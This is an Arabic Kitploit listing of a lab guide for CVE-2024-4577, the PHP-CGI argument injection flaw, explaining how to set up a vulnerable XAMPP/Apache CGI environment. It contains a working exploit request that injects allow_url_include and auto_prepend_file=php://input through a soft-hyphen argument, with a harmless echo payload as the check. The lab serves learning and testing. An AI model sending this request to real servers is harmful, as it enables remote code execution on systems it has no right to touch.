Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577 — إنشاء مختبر لـ CVE-2024-4577 | Kitploit
أدوات/GitHubGitHub/alpereny-cs/cve-2024-4577
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubalpereny-cs/cve-2024-4577

CVE-2024-4577

إنشاء مختبر لـ CVE-2024-4577

عرض المستودع
21منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4577 - PHP-CGI ثغرة حقن وسيطات تؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE)

CVEالوصفCVSSv3
CVE-2024-4577ثغرة حقن وسيطات PHP-CGI9.8

"CVE-2024-4577 هي ثغرة خطيرة في حقن الوسيطات في PHP يمكن استغلالها لتحقيق تنفيذ تعليمات برمجية عن بُعد (RCE). وفقًا للباحثين في DEVCORE، هذا الخلل هو نتيجة أخطاء في تحويل ترميز الأحرف، مما يؤثر على ميزة "Best Fit" في Windows." \

  • Tenable

إنشاء مختبر لـ CVE-2024-4577

تنزيل XAMPP

قم بتنزيل XAMPP (8.1.25 / PHP 8.1.25) بعد تثبيت XAMPP، تحقق من إصدار PHP. يجب أن يكون 8.1.25. يمكن التحقق من إصدار PHP عن طريق تشغيل الأمر "php -v" من سطر الأوامر. إذا أعطى خطأ، فيجب إضافته إلى متغير PATH الخاص بـ PHP.

تعيين الإعدادات المحلية

يلزم تغيير الإعدادات المحلية. للقيام بذلك، اتبع لوحة التحكم > الساعة والمنطقة > المنطقة. اضبط التنسيق على اليابانية أو الصينية التقليدية أو الصينية المبسطة. انقر على الإدارة > تغيير الإعدادات المحلية للنظام واختر الإعدادات المحلية المناسبة.

تكوين Apache

إذا لم يعمل PHP في وضع CGI، فيجب إجراء هذه الإعدادات.

  • انسخ php.exe أو php-cgi.exe إلى المجلد /cgi/bin/.
  • أضف هذه الأسطر إلى \xampp\apache\conf\httpd.conf ⬇️
root@kitploit:~
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • اذهب إلى httpd-xampp.conf وابحث عن LoadModule php_module "C:/xampp/php/php8apache2_4.dll". ضع '#' في بداية السطر.

تشغيل Apache

احفظ التغييرات وشغل خدمة Apache.

الاستغلال

إذا ظهر مخرجات كود PHP المرسل في نص طلب POST أدناه في الاستجابة، فإن خطوة الاستغلال ناجحة.

root@kitploit:~
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

إخلاء مسؤولية⚠️

هذه البيئة المختبرية مخصصة للأغراض التعليمية فقط ولا ينبغي استخدامها في بيئات حية. لست مسؤولاً عن أي أضرار أو خسائر قد تحدث نتيجة الاستخدام غير السليم. يجب على المستخدمين استخدام هذه البيئة على مسؤوليتهم الخاصة.

تنزيل الأداة